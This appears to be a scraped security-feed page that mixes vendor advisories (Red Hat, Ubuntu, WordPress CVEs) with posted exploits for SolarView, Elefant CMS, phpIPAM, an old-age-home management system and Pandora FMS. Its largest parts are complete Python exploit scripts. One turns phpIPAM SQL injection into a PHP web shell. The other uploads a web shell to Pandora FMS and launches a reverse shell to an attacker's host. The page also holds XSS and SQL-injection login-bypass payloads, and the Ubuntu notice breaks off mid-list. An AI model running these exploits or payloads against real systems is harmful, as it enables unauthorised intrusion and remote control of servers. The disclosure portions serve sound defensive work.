SolarView Compact version 6.00 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)# Date: 2022-05-15# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: ver.6.00# Vendor home page : https://www.contec.com/# Authentication Required: No# CVE : CVE-2022-29299# Tested on: Windows# Proof Of Concept:http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)# Date: 2022-05-15# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: ver.6.00# Vendor home page : https://www.contec.com/# Authentication Required: No# CVE : CVE-2022-29301# Tested on: Windows# Proof Of Concept:http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green

SolarView Compact 6.00 Cross Site Scripting

Red Hat Security Advisory 2022-5101-01 - AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. This release of Red Hat AMQ Broker 7.10.0 serves as a replacement for Red Hat AMQ Broker 7.9.4, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat AMQ Broker 7.10.0 release and security update  
Advisory ID:       RHSA-2022:5101-01  
Product:           Red Hat JBoss AMQ  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5101  
Issue date:        2022-06-16  
CVE Names:         CVE-2019-10744 CVE-2020-36518 CVE-2021-4040   
                   CVE-2021-43797 CVE-2022-1833 CVE-2022-22968   
                   CVE-2022-23913   
=====================================================================

1. Summary:

Red Hat AMQ Broker 7.10.0 is now available from the Red Hat Customer  
Portal.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

AMQ Broker is a high-performance messaging implementation based on ActiveMQ  
Artemis. It uses an asynchronous journal for fast message persistence, and  
supports multiple languages, protocols, and platforms.

This release of Red Hat AMQ Broker 7.10.0 serves as a replacement for Red  
Hat AMQ Broker 7.9.4, and includes security and bug fixes, and  
enhancements. For further information, refer to the release notes linked to  
in the References section.

Security Fix(es):

* nodejs-lodash: prototype pollution in defaultsDeep function leading to  
modifying properties (CVE-2019-10744)

* amq: AMQ Broker Operator ClusterWide Edit Permissions Due Token Exposure  
(CVE-2022-1833)

* jackson-databind: denial of service via a large depth of nested objects  
(CVE-2020-36518)

* AMQ Broker: Malformed message can result in partial DoS (OOM)  
(CVE-2021-4040)

* netty: control chars in header names may lead to HTTP request smuggling  
(CVE-2021-43797)

* artemis-commons: Apache ActiveMQ Artemis DoS (CVE-2022-23913)

* springframework: Spring Framework: Data Binding Rules Vulnerability  
(CVE-2022-22968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link (you must  
log in to download the update).

4. Bugs fixed (https://bugzilla.redhat.com/):

1739497 - CVE-2019-10744 nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties  
2028254 - CVE-2021-4040 AMQ Broker: Malformed message can result in partial DoS (OOM)  
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling  
2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2075441 - CVE-2022-22968 Spring Framework: Data Binding Rules Vulnerability  
2089406 - CVE-2022-1833 amq: AMQ Broker Operator ClusterWide Edit Permissions Due Token Exposure

5. References:

https://access.redhat.com/security/cve/CVE-2019-10744  
https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-4040  
https://access.redhat.com/security/cve/CVE-2021-43797  
https://access.redhat.com/security/cve/CVE-2022-1833  
https://access.redhat.com/security/cve/CVE-2022-22968  
https://access.redhat.com/security/cve/CVE-2022-23913  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.10.0  
https://access.redhat.com/documentation/en-us/red_hat_amq_broker/

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqtvX9zjgjWX9erEAQiSVxAAozdM4qReUkfVxsjOM15+JKJwZTDhtGc9  
+DSkxxbLO4CR6NntO3Ue2rDiVb38jH2pQpHpIUST2ahapqmuh71C2eQamRMdtSmS  
uQkft3d1UuHh4CillEhRO98LOUGvucWxzIGntymqsKRwfrcB7NfARwmHXabYGSZq  
H1OHepSFKU7g2IIxiJqxDwj9DO87lSyah9XANYDtaUtMadNhJ0Gc2U2aN45lUC6S  
N6VA2IZAl6L3CT7bF8AKGFZd4eVbhPMkDHk0leVdle2kQoThXpuR4qr8h7s9/ZVc  
JnYjJHiaK/Qb1k5vfvjyQUiKtykdwEQ+atey628fZhhusEtCWorGJv6mFkaqbNcc  
2lAnJzCLBLvJHjWKlOfpGQey01A8m20zGdeJmyz8zlWwCPq0biXrCaXbjpMJ/9Mh  
ocDSLrxg5StRuRQ7stTeW3D7FQhP0aa7l6PwunWvepPqd3AXYSxCptfmHwzAaxQz  
qwMbJ7bM9ewuzRcZwalHDoUt5uquM1k/27rV1BFlAcz7XbCKhP5Uu+mzb3j415YS  
RmsS/c/f7zoV0M+cUkdRq7/tCN3+cyYfgY/s5PpGxvYo1vCe7TjYsxn07ylMPryA  
v+Qzrnb5SV+5Wuk7+BYkp42DR0MZmVAsq/kxoXMOCdW3GZiUc3W0tQZqsSMvjvxc  
CPv0F79fXT8=  
=g2zv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5101-01

The Allow svg files WordPress plugin before 1.1 does not properly validate uploaded files, which could allow high privilege users such as admin to upload PHP files even when they are not allowed to

CVE-2022-1939

The WP-EMail WordPress plugin before 2.69.0 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based anti-spamming restrictions.

CVE-2022-1614

A vulnerability has been found in Elefant CMS 1.3.12-RC and classified as problematic. This vulnerability affects unknown code of the file /admin/extended. The manipulation of the argument name with the input %3Cimg%20src=no%20onerror=alert(1)%3E leads to basic cross site scripting (Reflected). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS**

_From_: "Curesec Research Team (CRT)" <crt () curesec com>  
_Date_: Thu, 16 Feb 2017 12:23:48 +0100  

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:  Elefant CMS 1.3.12-RC
Fixed in:          1.3.13
Fixed Version      https://github.com/jbroadway/elefant/releases/tag/
Link:              elefant\_1\_3\_13\_rc
Vendor Website:    https://www.elefantcms.com/
Vulnerability      XSS
Type:
Remote             Yes
Exploitable:
Reported to        09/05/2016
vendor:
Disclosed to       02/02/2017
public:
Release mode:      Coordinated Release
CVE:               n/a (not requested)
Credits            Tim Coen of Curesec GmbH

2. Overview

Elefant is a content managment system written in PHP. In version 1.3.12-RC, it
is vulnerable to multiple persistent as well as a reflected XSS issue. This
allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass
CSRF protection.

3. Details

Persistent XSS: Username

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

The username is echoed in various locations in the administration backend
without encoding, leading to persistent XSS vulnerabilities. A user account is
required, but the registration is open by default.

Proof of Concept:

1. Register a new user (the registration is open by default). 2. Update the
profile, as name use: Username<img src=no onerror=alert(1)> To trigger the
payload: 1. Log in as admin 2. View the edit page for the user, for example:
http://localhost/user/edit?id=3 Alternatively, the payload is also echoed on
the page listing all users: http://localhost/admin/versions?id=&type=User As
well as on the version page: http://localhost/admin/versions?type=User&id=3

Persistent XSS: Version Comparison

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Various fields of various components are echoed unencoded when comparing
versions of those components. Examples are the user profile fields Name,
Address, Address 2, City, Title, Company, or About, or the Title, Menu Title,
Window Title, Description, or Keyword of a page.

Proof of Concept:

The comparison page can for example be seen here: http://localhost/admin/
compare?id=8&current=no

Persistent XSS: Page & Content Block

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title of a new webpage is echoed unencoded, leading to persistent XSS. The
same issue also exists when creating blocks.

A user account with the right to create pages is required. By default, the
editor role has this right.

Proof of Concept:

Create a new page or block, as title use: </title><img src=no onerror=alert(1)>
The payload will be echoed in a title tag as well as a h1 tag when viewing the
page and when editing the page.

Persistent XSS: Blog Post

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title as well as the tags of a blog post are echoed unencoded, leading to
persistent XSS.

A user account with the right to create pages is required. By default, the
editor role has this right

Proof of Concept:

Create a new blog post, as title and tag use: </title>'"><img src=no onerror=
alert(1)> The payload will be echoed in a title tag, a h1 tag, as well as a
href tag when viewing the page and when editing the page.

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The name parameter of the custom fields component is vulnerable to reflected
XSS.

Proof of Concept:

GET /admin/extended?extends=User&name=%3Cimg%20src=no%20onerror=alert(1)%3E
HTTP/1.1

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Multiple-Persistent-and-Reflected-XSS-191.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS** _Curesec Research Team (CRT) (Feb 16)_

CVE-2017-20061: Multiple Persistent and Reflected XSS

phpIPAM version 1.4.5 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-04-10# Exploit Author: Guilherme '@behiNdyk1' Alves# Vendor Homepage: https://phpipam.net/# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5# Version: 1.4.5# Tested on: Linux Ubuntu 20.04.3 LTS#!/usr/bin/env python3import requestsimport argparsefrom sys import exit, argvfrom termcolor import coloredbanner = """█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█   ▄█ ░ █░█ ░ █▀   █▀ █▀█ █░░ █   ▀█▀ █▀█   █▀█ █▀▀ █▀▀█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█   ░█ ▄ ▀▀█ ▄ ▄█   ▄█ ▀▀█ █▄▄ █   ░█░ █▄█   █▀▄ █▄▄ ██▄█▄▄ █▄█   █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀█▄█ ░█░   █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n"""print(banner)parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)parser.add_argument("-usr", type=str, help="Username to log in as", required=True)parser.add_argument("-pwd", type=str, help="User's password", required=True)parser.add_argument("-cmd", type=str, help="Command to execute", default="id")parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")args = parser.parse_args()url = args.urlusername = args.usrpassword = args.pwdcommand = args.cmdpath = args.path# Validating urlif url.endswith("/"):  url = url[:-1]if not url.startswith("http://") and not url.startswith("https://"):  print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))  exit()def login(url, username, password):  """Takes an username and a password and tries to execute a login (IPAM)"""  data = {  "ipamusername": username,  "ipampassword": password  }  print(colored(f"[...] Trying to log in as {username}", "blue"))  r = requests.post(f"{url}/app/login/login_check.php", data=data)  if "Invalid username or password" in r.text:    print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))    exit()  else:    print(colored("[+] Login successful!", "green"))    return str(r.cookies['phpipam'])auth_cookie = login(url, username, password)def exploit(url, auth_cookie, path, command):  print(colored("[...] Exploiting", "blue"))  vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"  data = {  "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",  "bgp_id": "1"  }  cookies = {  "phpipam": auth_cookie  }  requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)  test = requests.get(f"{url}/evil.php")  if test.status_code != 200:    return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))  if "--shell" in argv:    while True:      command = input("Shell> ")      r = requests.get(f"{url}/evil.php?cmd={command}")      print(r.text)  else:    print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))    r = requests.get(f"{url}/evil.php?cmd={command}")    print(f"\n\n[+] Output:\n{r.text}")exploit(url, auth_cookie, path, command)

phpIPAM 1.4.5 Remote Code Execution

Old Age Home Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass# Date: 12/06/2022# Exploit Author: twseptian# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip# Version: v1.0# Tested on: Kali Linux# Vulnerable codeline 9 in file "/oahms/admin/login.php"$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");# Steps of reproduce:1. Go to the admin login page http://localhost/oahms/admin/login.php2. sqli payload:  admin' or '1'='1';-- -3. password: password# Proof of ConceptPOST /oahms/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 71Origin: http://localhostConnection: closeReferer: http://localhost/oahms/admin/login.phpCookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=

Old Age Home Management System 1.0 SQL Injection

Pandora FMS version 7.0NG.742 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)# Date: 05/20/2022# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://pandorafms.com/# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz# Version: v7.0NG.742# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)# CVE: CVE-2020-5844# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.#!/usr/bin/env python3# Importstry:    import requestsexcept:    print(f"ERRORED: RUN: pip install requests")    exit()import sysimport timeimport urllib.parse# Class for colorsclass color:    red = '\033[91m'    gold = '\033[93m'    blue = '\033[36m'    green = '\033[92m'    no = '\033[0m'# Print UNICORD ASCII Artdef UNICORD_ASCII():    print(rf"""{color.red}        _ __,~~~{color.gold}/{color.red}_{color.no}        {color.blue}__  ___  _______________  ___  ___{color.no}{color.red}    ,~~`( )_( )-\|       {color.blue}/ / / / |/ /  _/ ___/ __ \/ _ \/ _ \{color.no}{color.red}        |/|  `--.       {color.blue}/ /_/ /    // // /__/ /_/ / , _/ // /{color.no}{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}    """)# Print exploit help menudef help():    print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code ExecutionUsage:  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]  python3 exploit-CVE-2020-5844.py -hOptions:  -t    Target host and port. Provide target IP address and port.  -u    Target username and password. Provide username and password to log in to Pandora FMS.  -p    Target valid PHP session ID. No username or password needed. (Optional)  -s    Reverse shell mode. Provide local IP address and port. (Optional)  -c    Custom command mode. Provide command to execute. (Optional)  -w    Web shell custom mode. Provide custom PHP file name. (Optional)  -h    Show this help menu.""")    exit()# Pretty loading wheeldef loading(spins):    def spinning_cursor():        while True:            for cursor in '|/-\\':                yield cursor    spinner = spinning_cursor()    for _ in range(spins):        sys.stdout.write(next(spinner))        sys.stdout.flush()        time.sleep(0.1)        sys.stdout.write('\b')# Run the exploitdef exploit(exploitMode, targetSess):    UNICORD_ASCII()    # Print initial variables    print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")    print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")    if targetSess is not None:        print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")    elif targetUser is not None:        print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")        print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")    if exploitMode == "command":        print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")    if exploitMode == "web":        print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")    if exploitMode == "shell":        print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")        print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")    print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")    loading(15)    # If a PHPSESSID is not provided, grab one with valid username and password    if targetSess is None:        try:            getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})            targetSess = getSession.cookies.get('PHPSESSID')            print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")            if "login_move" in getSession.text:                print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")        except:            print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")            exit()    # Set headers, parameters, and cookies for post request    headers = {    'Host': f'{targetIP}',    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',    'Content-Length': '1289',    'Connection': 'close',    'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',    'Upgrade-Insecure-Requests': '1',    'Sec-Fetch-Dest': 'document',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-User': '?1'    }    params = (        ('sec', 'gsetup'),        ('sec2', 'godmode/setup/file_manager')    )    cookies = {'PHPSESSID': targetSess}    # Basic PHP web shell with 'cmd' parameter    data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'    # Try to upload the PHP web shell to the server    try:        response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)    except:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")        exit()    statusCode=response.status_code    if statusCode == 200:        print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")    else:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")        exit()    loading(15)    print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")    loading(15)    # Print web shell location if in web shell mode    if exploitMode == "web":        print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")        print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")    # Run custom command on web shell if in command mode    if exploitMode == "command":        response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')        print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")        print(response.text)    # Run reverse shell command if in reverse shell mode    if exploitMode == "shell":        shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"        try:            requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)            print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")        except:            print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")    exit()if __name__ == "__main__":    args = ['-h','-t','-u','-p','-s','-c','-w']    modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}    # Initialize starting variables    targetIP = None    targetPort = None    targetUser = None    targetPass = None    targetSess = None    command = None    localIP = None    localPort = None    webName = "unicord.php" # Default web shell file name    exploitMode = "web" # Default to web shell mode    # Print help if specified or if a target or authentication is not provided    if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):        help()    # Collect target IP and port from CLI    if args[1] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 1]:                raise            targetIP = sys.argv[sys.argv.index(args[1]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 2]:                raise            targetPort = sys.argv[sys.argv.index(args[1]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()    # Collect target username and password from  CLI    if args[2] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 1]:                raise            targetUser = sys.argv[sys.argv.index(args[2]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 2]:                raise            targetPass = sys.argv[sys.argv.index(args[2]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()    # Collect PHPSESSID from CLI, if specified    if args[3] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[3]) + 1]:                raise            targetSess = sys.argv[sys.argv.index(args[3]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")            exit()    # Set reverse shell mode from CLI, if specified    if args[4] in sys.argv:        exploitMode = "shell"        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 1]:                raise            localIP = sys.argv[sys.argv.index(args[4]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 2]:                raise            localPort = sys.argv[sys.argv.index(args[4]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set custom command mode from CLI, if specified    elif args[5] in sys.argv:        exploitMode = "command"        try:            if sys.argv[sys.argv.index(args[5]) + 1] in args:                raise            command = sys.argv[sys.argv.index(args[5]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set web shell mode from CLI, if specified    elif args[6] in sys.argv:        exploitMode = "web"        try:            if sys.argv[sys.argv.index(args[6]) + 1] in args:                raise            if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:                webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"            else:                webName = sys.argv[sys.argv.index(args[6]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Run with default web shell mode if no mode is specified    else:        exploit(exploitMode,targetSess)

Pandora FMS 7.0NG.742 Remote Code Execution

Ubuntu Security Notice 5479-1 - Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5479-1  
June 15, 2022

php7.2, php7.4, php8.0, php8.1 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php8.0: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter  
- php7.2: HTML-embedded scripting language interpreter

Details:

Charles Fol discovered that PHP incorrectly handled initializing certain  
arrays when handling the pg_query_params function. A remote attacker could  
use this issue to cause PHP to crash, resulting in a denial of service, or  
possibly execute arbitrary code. (CVE-2022-31625)

Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A  
remote attacker could use this issue to cause PHP to crash, resulting in a  
denial of service, or possibly execute arbitrary code. (CVE-2022-31626)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
